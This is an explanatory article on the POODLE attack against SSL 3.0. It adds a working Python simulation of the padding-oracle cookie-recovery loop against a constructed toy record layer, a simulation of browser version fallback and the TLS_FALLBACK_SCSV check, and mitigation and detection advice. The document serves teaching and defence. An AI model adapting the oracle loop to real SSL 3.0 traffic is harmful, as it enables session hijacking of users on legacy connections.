POODLE (Padding Oracle On Downgraded Legacy Encryption) enables web session hijacking by combining a protocol downgrade with a padding flaw in Secure Sockets Layer version 3 (SSL 3.0). The downgrade is not a feature of TLS itself: when a TLS handshake fails, most browsers retry with a lower protocol version to accommodate broken middleboxes, and when POODLE was disclosed (October 2014) every major browser still fell back all the way to SSL 3.0 for backwards compatibility, long after the protocol had been deprecated. An attacker positioned as a man-in-the-middle simply interferes with the TLS handshakes until the client retries with SSL 3.0. In SSL 3.0, the CBC padding at the end of a record is not covered by the MAC and only its final byte (the padding length) is checked, so the server's accept/reject behaviour acts as a padding oracle. Using JavaScript running in the victim's browser to issue many requests with a chosen path and body length, the attacker aligns one byte of the session cookie at the end of a ciphertext block, copies that block over the final (all-padding) block of the record, and learns the cookie byte whenever the server accepts the modified record, which happens on average once per 256 attempts. Stepping through the cookie one byte at a time recovers the whole cookie, which can then be used to hijack the session.
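The mechanics described above, as an added worked example that is not part of the original page and not code from the POODLE paper: a constructed toy SSL 3.0 CBC record layer (a 4-round HMAC-SHA256 Feistel network stands in for 3DES or AES, and the session keys, the request template and the secret cookie are all assumptions made up for the simulation), a "browser" whose request lengths the attacker controls, and the attacker loop that aligns each cookie byte, swaps the target ciphertext block into the padding position, and solves for the byte when the server accepts the record.

```python
import hashlib
import hmac
import os

# Toy SSL 3.0 CBC record layer, constructed for this example.
# The block cipher is a 4-round HMAC-SHA256 Feistel network standing in for 3DES/AES;
# the attack only relies on it being an invertible block cipher.
BLOCK = 16
MAC_LEN = 16
ENC_KEY = b"constructed-enc-key"   # assumed session keys, fixed for the simulation
MAC_KEY = b"constructed-mac-key"


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(i, half):
    return hmac.new(ENC_KEY, bytes([i]) + half, hashlib.sha256).digest()[:8]


def block_encrypt(block):
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(i, r))
    return l + r


def block_decrypt(block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(i, l)), l
    return l + r


def cbc_encrypt(pt, iv):
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(_xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(ct, iv):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        blk = ct[i:i + BLOCK]
        out.append(_xor(block_decrypt(blk), prev))
        prev = blk
    return b"".join(out)


def ssl3_seal(data):
    """Client side: data || MAC || padding, CBC-encrypted under a fresh random IV."""
    mac = hmac.new(MAC_KEY, data, hashlib.sha256).digest()[:MAC_LEN]
    pad_len = (BLOCK - 1) - (len(data) + MAC_LEN) % BLOCK
    # SSL 3.0 padding: pad_len filler bytes (never checked) followed by the length byte
    pt = data + mac + os.urandom(pad_len) + bytes([pad_len])
    iv = os.urandom(BLOCK)
    return iv + cbc_encrypt(pt, iv)


def ssl3_open(record):
    """Server side: True iff the record is accepted. Its accept/reject answer is the oracle."""
    iv, ct = record[:BLOCK], record[BLOCK:]
    pt = cbc_decrypt(ct, iv)
    pad_len = pt[-1]
    if pad_len > BLOCK - 1:          # the only padding check SSL 3.0 performs
        return False
    body = pt[:-(pad_len + 1)]       # MAC does not cover the padding
    data, mac = body[:-MAC_LEN], body[-MAC_LEN:]
    expected = hmac.new(MAC_KEY, data, hashlib.sha256).digest()[:MAC_LEN]
    return hmac.compare_digest(mac, expected)


# The victim's browser: attacker JavaScript controls the path and body length,
# the browser attaches the secret cookie on its own. All values are constructed.
SECRET_COOKIE = b"sid=7f3a9c2e"
REQ_HEAD = b"POST /"
REQ_MID = b" HTTP/1.1\r\nCookie: "
REQ_TAIL = b"\r\n\r\n"
COOKIE_OFFSET = len(REQ_HEAD) + len(REQ_MID)   # offset of cookie[0] when prefix_len == 0


def browser_request(prefix_len, suffix_len):
    return REQ_HEAD + b"A" * prefix_len + REQ_MID + SECRET_COOKIE + REQ_TAIL + b"B" * suffix_len


def poodle_recover_cookie(max_tries_per_byte=20000):
    """Recover SECRET_COOKIE using only the server's accept/reject answers."""
    recovered = bytearray()
    for k in range(len(SECRET_COOKIE)):
        # 1. choose the path length so that cookie byte k is the last byte of some block
        prefix_len = (BLOCK - 1 - COOKIE_OFFSET - k) % BLOCK
        target = (COOKIE_OFFSET + prefix_len + k) // BLOCK      # plaintext block holding the byte
        # 2. choose the body length so data+MAC fills whole blocks: the last block is all padding
        suffix_len = -(len(browser_request(prefix_len, 0)) + MAC_LEN) % BLOCK
        for _ in range(max_tries_per_byte):
            record = ssl3_seal(browser_request(prefix_len, suffix_len))
            blocks = [record[i:i + BLOCK] for i in range(0, len(record), BLOCK)]  # blocks[0] is the IV
            c_target, c_before = blocks[target + 1], blocks[target]
            # 3. replace the final (all-padding) ciphertext block with the target block
            tampered = b"".join(blocks[:-1]) + c_target
            if ssl3_open(tampered):
                # the server decrypted C_target as P_target XOR C_before XOR C_last_prev and found
                # its final byte equal to BLOCK-1 (a full padding block), so solve for P_target[-1]
                recovered.append((BLOCK - 1) ^ c_before[-1] ^ blocks[-2][-1])
                break
        else:
            raise RuntimeError("oracle never accepted a forged record")
    return bytes(recovered)


if __name__ == "__main__":
    print(poodle_recover_cookie())
```

Each cookie byte costs about 256 forged records, and every rejected one surfaces at the server as a decryption failure; that burst of near-identical SSL 3.0 records followed by failures is what a network sensor would key on.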

Disabling fallback to SSL 3.0 in browsers, and disabling SSL 3.0 entirely on servers, prevents the POODLE attack from succeeding. The TLS_FALLBACK_SCSV signaling cipher suite (RFC 7507) gives both sides a standard way to do this short of dropping the protocol: a client that retries a handshake at a lower version includes the SCSV in its cipher list, and a server that supports a higher version refuses such a connection with an inappropriate_fallback alert. However, there's an easier way for end users to reduce their exposure: don't use open WiFi hotspots. Because POODLE requires man-in-the-middle access to the traffic exchanged between the browser and the web server, encrypting your own wireless traffic with WPA2 (or even WPA) raises the bar, at least over wireless. Note the limit of that protection: on a network whose pre-shared key is handed out to everyone, anyone with the key is on the same network and can still get in the middle of other clients' traffic, so WPA2 only keeps out attackers who are not on the network. Alternatively, "bring your own encryption" to open WiFi hotspots by sending all of your traffic, even encrypted web traffic, through a VPN tunnel.
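The fallback dance and the RFC 7507 check, as an added simulation that is not part of the original page: a browser that retries one version lower whenever a handshake fails, a man-in-the-middle that interferes with every handshake above SSL 3.0, and a server applying the SCSV rule. Handshakes are plain dicts rather than real TLS messages, the version list, the placeholder cipher suite id 0x002F and the server configurations are constructed for the example.

```python
# Constructed simulation of browser version fallback and TLS_FALLBACK_SCSV (RFC 7507).
# Not real TLS: a ClientHello is a dict and the network is a function that may drop it.
TLS_FALLBACK_SCSV = 0x5600
VERSIONS = ["TLS1.2", "TLS1.1", "TLS1.0", "SSL3.0"]   # ordered highest to lowest


def rank(version):
    return VERSIONS.index(version)   # 0 is the highest version


def server_respond(hello, supported):
    """RFC 7507 server rule: if the SCSV is present and the offered version is lower than
    the highest version this server supports, abort with inappropriate_fallback."""
    if hello["version"] not in supported:
        return {"alert": "protocol_version"}
    highest = min(supported, key=rank)
    if TLS_FALLBACK_SCSV in hello["ciphers"] and rank(hello["version"]) > rank(highest):
        return {"alert": "inappropriate_fallback"}
    return {"version": hello["version"]}


def browser_connect(network, send_scsv):
    """Insecure fallback as browsers did it in 2014: on a dropped or failed handshake,
    retry one version lower. Returns the negotiated version, or None if refused."""
    for i, version in enumerate(VERSIONS):
        ciphers = [0x002F]                       # placeholder suite id (constructed)
        if send_scsv and i > 0:                  # SCSV is sent only on a fallback retry
            ciphers.append(TLS_FALLBACK_SCSV)
        reply = network({"version": version, "ciphers": ciphers})
        if reply is None or reply.get("alert") == "protocol_version":
            continue                             # browser assumes a broken middlebox and retries lower
        if reply.get("alert") == "inappropriate_fallback":
            return None                          # server refused the downgrade
        return reply["version"]
    return None


def poodle_attacker(server_supported):
    """Man-in-the-middle that breaks every handshake until the client offers SSL 3.0."""
    def network(hello):
        if hello["version"] != "SSL3.0":
            return None
        return server_respond(hello, server_supported)
    return network


SERVER_ALL = ["TLS1.2", "TLS1.1", "TLS1.0", "SSL3.0"]   # legacy server configuration
SERVER_NO_SSL3 = ["TLS1.2", "TLS1.1", "TLS1.0"]         # SSL 3.0 disabled


def scenarios():
    """Negotiated version for each combination of browser, server and attacker."""
    return {
        "legacy browser, legacy server, attacker": browser_connect(poodle_attacker(SERVER_ALL), False),
        "SCSV browser, legacy server, attacker": browser_connect(poodle_attacker(SERVER_ALL), True),
        "legacy browser, SSL3 disabled, attacker": browser_connect(poodle_attacker(SERVER_NO_SSL3), False),
        "SCSV browser, legacy server, no attacker": browser_connect(lambda h: server_respond(h, SERVER_ALL), True),
    }


if __name__ == "__main__":
    for name, result in scenarios().items():
        print(f"{name}: {result}")
```

Only the first scenario ends in an SSL 3.0 session; either fix on its own (the browser signaling its retry with the SCSV, or the server refusing SSL 3.0 outright) leaves the attacker with no connection to exploit, and an honest client that succeeds on its first attempt never sends the SCSV at all.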

Perhaps POODLE will finally give software vendors a good reason to retire SSL 3.0. In the meantime, companies that operate open WiFi hotspots (e.g., guest access networks, public hotspots) should use an IPS to watch for the POODLE downgrade and cookie-guessing traffic described in the above advisory: a client that repeatedly falls back to SSL 3.0 and then sends hundreds of near-identical records that the server rejects is the pattern to look for.